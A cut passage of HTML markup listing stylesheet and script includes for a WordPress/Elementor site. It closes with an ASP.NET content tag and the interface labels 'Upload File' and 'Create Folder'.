href="wp-content--1/style.css" rel="stylesheet" /> <link href="wp-content--1/all.min.css" rel="stylesheet" /> <link href="wp-content--1/v4-shims.min.css" rel="stylesheet" /> <link href="wp-content--1/all.min-1.css" rel="stylesheet" /> <link href="wp-content--1/post-987845.css" rel="stylesheet" /> <script src="wp-content--1/widget-scripts.js"></script> <script src="wp-content--1/parallax-frontend-scripts.js"></script> <script src="wp-content--1/webpack.runtime.min.js"></script> <script src="wp-content--1/frontend-modules.min.js"></script> <script src="wp-content--1/waypoints.min.js"></script> <script src="wp-content--1/core.min.js"></script><script src="wp-content--1/anime.js"></script> <script type="text/javascript" src="https://www.dwpsnoidaex.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.14.1" id="elementor-frontend-js" defer></script> <script type="text/javascript" src="wp-content--1/widgets/image/vamtam-image.min.js"></script> <script type="text/javascript" src="wp-content--1/vamtam-text-editor.min.js"></script> <script type="text/javascript" src="wp-content--1/imagesloaded.min.js"></script> <script src="wp-content--1/tribe-common.min.js"></script> <script src="wp-content--1/draggable.min.js"></script> <script src="wp-content--1/week-grid-scroller.min.js"></script> <script src="wp-content--1/jquery.nanoscroller.min.js"></script> <script src="wp-content--1/week-event-link.min.js"></script> <script src="wp-content--1/mouse.min.js"></script> <script src="wp-content--1/week-multiday-toggle.min.js"></script> <script src="wp-content--1/map-events-scroller.min.js"></script> <script src="wp-content--1/week-multiday-toggle.min.js"></script> <script src="wp-content--1/accordion.min.js"></script> <script src="wp-content--1/week-event-link.min.js"></script> <script src="wp-content--1/week-day-selector.min.js"></script> <script src="wp-content--1/general.min.js"></script> <script src="wp-content--1/eael-987845.js"></script> <script src="wp-content--1/frontend-script.js"></script> </asp:Content>
Upload File
Create Folder